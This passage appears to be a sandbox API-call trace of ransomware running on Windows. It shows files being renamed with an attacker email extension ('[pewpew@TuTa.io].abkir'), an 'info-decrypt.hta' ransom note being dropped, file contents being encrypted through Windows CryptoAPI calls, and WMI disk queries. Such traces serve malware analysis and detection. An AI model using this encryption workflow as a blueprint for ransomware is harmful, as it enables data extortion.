plFlavor=0x35f3ba8*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x35f3ba4*=8, plFlavor=0x35f3ba8*=0) returned 0x0 [0197.141] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.141] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.141] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", lpFilePart=0x0) returned 0x4f [0197.141] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x72 [0197.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0197.141] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2eadc700, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0197.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0197.142] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0197.143] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0197.143] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0197.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0197.143] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e3b8500, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x2e3b8500, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x2e3b8500, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0197.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0197.143] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0197.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0197.143] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), fInfoLevelId=0x0, lpFileInformation=0x35f425c | out: lpFileInformation=0x35f425c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa)) returned 1 [0197.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0197.143] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0197.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0197.144] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x328 [0197.144] GetFileType (hFile=0x328) returned 0x1 [0197.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0197.144] GetFileType (hFile=0x328) returned 0x1 [0197.144] GetFileSize (in: hFile=0x328, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x5aa [0197.144] ReadFile (in: hFile=0x328, lpBuffer=0x35f4a5c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x35f4a5c*, lpNumberOfBytesRead=0x6c0f4ec*=0x5aa, lpOverlapped=0x0) returned 1 [0197.158] CloseHandle (hObject=0x328) returned 1 [0197.158] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0x66bb950) returned 1 [0197.159] CryptGenRandom (in: hProv=0x66bb950, dwLen=0x10, pbBuffer=0x35f6120 | out: pbBuffer=0x35f6120) returned 1 [0197.462] CryptImportKey (in: hProv=0x66bb950, pbData=0x37cd4b0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7f5d0) returned 1 [0197.462] CryptContextAddRef (hProv=0x66bb950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0197.462] CryptContextAddRef (hProv=0x66bb950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0197.462] CryptDuplicateKey (in: hKey=0xb7f5d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7fb10) returned 1 [0197.462] CryptContextAddRef (hProv=0x66bb950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0197.462] CryptSetKeyParam (hKey=0xb7fb10, dwParam=0x4, pbData=0x37cd590*=0x1, dwFlags=0x0) returned 1 [0197.462] CryptSetKeyParam (hKey=0xb7fb10, dwParam=0x1, pbData=0x37cd55c, dwFlags=0x0) returned 1 [0197.462] CryptEncrypt (in: hKey=0xb7fb10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37cd5a0*, pdwDataLen=0x6c0f4b8*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x37cd5a0*, pdwDataLen=0x6c0f4b8*=0x5b0) returned 1 [0197.463] CryptEncrypt (in: hKey=0xb7fb10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37cdb74*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x37cdb74*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0197.464] CryptDestroyKey (hKey=0xb7f5d0) returned 1 [0197.464] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0197.464] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0197.464] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0197.464] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0197.464] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0197.465] GetFileType (hFile=0x324) returned 0x1 [0197.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0197.465] GetFileType (hFile=0x324) returned 0x1 [0197.465] WriteFile (in: hFile=0x324, lpBuffer=0x37ce1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x37ce1b4*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0197.466] CloseHandle (hObject=0x324) returned 1 [0197.950] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0197.950] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0197.951] CoTaskMemFree (pv=0xbed438) [0197.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0197.951] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0197.951] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0197.951] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0197.951] IUnknown:Release (This=0xb51e34) returned 0x1 [0197.952] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x6027620) returned 0x0 [0197.952] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027620, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0197.952] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027620, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x6030a20) returned 0x0 [0197.952] WbemDefPath:IUnknown:Release (This=0x6027620) returned 0x0 [0197.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x6030a20) returned 0x0 [0197.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0197.953] WbemDefPath:IUnknown:AddRef (This=0x6030a20) returned 0x3 [0197.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0197.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0197.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0x66ccdc8) returned 0x0 [0197.953] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccdc8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.953] WbemDefPath:IUnknown:Release (This=0x66ccdc8) returned 0x3 [0197.953] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0197.953] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0197.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0197.953] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x2 [0197.953] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x1 [0197.953] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0197.953] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0197.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x6030a20) returned 0x0 [0197.953] WbemDefPath:IUnknown:AddRef (This=0x6030a20) returned 0x3 [0197.953] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x2 [0197.953] WbemDefPath:IWbemPath:SetText (This=0x6030a20, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.953] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0197.953] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0197.953] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.954] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0197.954] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0197.954] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0197.954] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0197.954] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0197.954] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0197.954] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0197.954] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.954] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0197.954] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0197.954] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0197.954] IUnknown:Release (This=0xb51e34) returned 0x1 [0197.955] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x6027640) returned 0x0 [0197.955] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027640, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0197.955] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027640, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x60309b0) returned 0x0 [0197.955] WbemDefPath:IUnknown:Release (This=0x6027640) returned 0x0 [0197.955] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x60309b0) returned 0x0 [0197.955] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0197.955] WbemDefPath:IUnknown:AddRef (This=0x60309b0) returned 0x3 [0197.955] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0197.955] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0197.955] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0x66ccc28) returned 0x0 [0197.955] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccc28, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.955] WbemDefPath:IUnknown:Release (This=0x66ccc28) returned 0x3 [0197.955] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0197.955] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0197.955] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0197.955] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x2 [0197.955] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x1 [0197.955] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0197.955] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0197.955] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x60309b0) returned 0x0 [0197.955] WbemDefPath:IUnknown:AddRef (This=0x60309b0) returned 0x3 [0197.955] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x2 [0197.956] WbemDefPath:IWbemPath:SetText (This=0x60309b0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0197.956] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0197.956] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0197.956] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.956] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0197.956] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0197.956] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0197.956] IUnknown:Release (This=0xb51e34) returned 0x1 [0197.956] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, 